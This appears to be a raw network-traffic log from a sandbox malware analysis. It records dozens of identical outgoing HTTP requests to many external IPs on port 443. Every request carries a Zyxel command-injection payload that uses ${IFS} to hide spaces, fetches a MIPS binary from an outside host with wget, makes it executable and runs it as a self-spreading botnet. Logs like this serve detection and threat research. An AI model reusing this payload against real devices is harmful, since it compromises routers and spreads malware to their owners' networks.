                                            Feb 2, 2024 06:21:19.767390013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6036192.168.2.154296240.126.17.157443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.767431974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6037192.168.2.155390619.77.184.78443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.767453909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6038192.168.2.1551314106.35.218.123443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.767513037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6039192.168.2.154833062.102.120.194443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.767558098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6040192.168.2.154014676.169.235.177443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.767585039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6041192.168.2.155483064.24.137.62443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.767652035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6042192.168.2.154878867.224.96.64443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.767682076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6043192.168.2.154484269.220.244.209443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.767709970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6044192.168.2.1556684194.103.169.193443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.767760038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6045192.168.2.153786685.15.13.232443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.767802000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6046192.168.2.1560482114.29.37.119443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.767833948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6047192.168.2.153997881.172.92.185443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.767869949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6048192.168.2.1555480196.22.215.7443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.767901897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6049192.168.2.156082487.180.198.117443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.767955065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6050192.168.2.155709487.47.225.3443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.768008947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6051192.168.2.1557466188.161.178.84443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.768040895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6052192.168.2.1536500113.110.60.250443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.768099070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6053192.168.2.154864489.101.243.97443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.768117905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6054192.168.2.1535288188.174.102.64443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.768167973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6055192.168.2.1535166188.205.149.56443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.768213987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6056192.168.2.155352296.36.124.56443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.768251896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6057192.168.2.1541528181.37.78.99443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.768277884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6058192.168.2.154137820.98.74.217443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.768305063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6059192.168.2.1534672123.200.223.30443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.768342972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6060192.168.2.1555882126.14.35.210443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.768372059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6061192.168.2.1555696187.97.224.155443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.768425941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6062192.168.2.1557836174.43.104.8443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.768466949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6063192.168.2.1555210128.100.94.178443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.768490076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6064192.168.2.154252459.228.160.149443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.768537998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6065192.168.2.1555146128.59.193.123443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.768570900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6066192.168.2.1550742210.29.124.107443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.768609047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6067192.168.2.15517349.72.97.100443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.768632889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6068192.168.2.1552652173.215.101.42443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.768667936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6069192.168.2.1548734124.216.233.39443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.768692970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6070192.168.2.1547070147.116.103.89443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.768724918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6071192.168.2.1551286153.169.123.105443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.768775940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6072192.168.2.155407644.26.114.111443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.768827915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6073192.168.2.1533436198.109.221.24443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.768878937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6074192.168.2.154774271.180.179.255443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.768927097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6075192.168.2.155928881.45.219.230443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.768973112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6076192.168.2.155966012.1.164.93443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.769006014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6077192.168.2.1550572133.116.81.131443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.769047976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6078192.168.2.1536880190.240.162.112443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.769089937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6079192.168.2.1555122116.151.242.102443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.769140005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6080192.168.2.1541906131.194.107.74443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.769164085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6081192.168.2.1537778149.159.218.187443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.769193888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6082192.168.2.1546736102.247.14.112443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.769244909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6083192.168.2.1541576121.19.152.0443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.769287109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6084192.168.2.156051467.234.225.19443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.769324064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6085192.168.2.1553358132.140.81.202443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.769368887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6086192.168.2.1533302213.110.69.255443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.769423962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6087192.168.2.155789043.160.11.39443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.769434929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6088192.168.2.1534872134.208.152.84443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.769486904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6089192.168.2.1537302161.142.29.43443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.769541025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6090192.168.2.153516289.37.134.236443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.769586086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6091192.168.2.154511236.74.34.191443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.769634008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6092192.168.2.154365854.156.141.182443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.769649982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6093192.168.2.1558384210.84.15.29443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.769695044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6094192.168.2.15444964.253.102.84443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.769722939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6095192.168.2.1540712221.251.184.194443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.769785881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6096192.168.2.1549014183.116.131.190443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.769839048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6097192.168.2.153753881.28.211.214443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.769876003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6098192.168.2.1535620218.93.25.116443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.769908905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6099192.168.2.1535502118.1.195.148443
                                            TimestampBytes transferredDirectionData
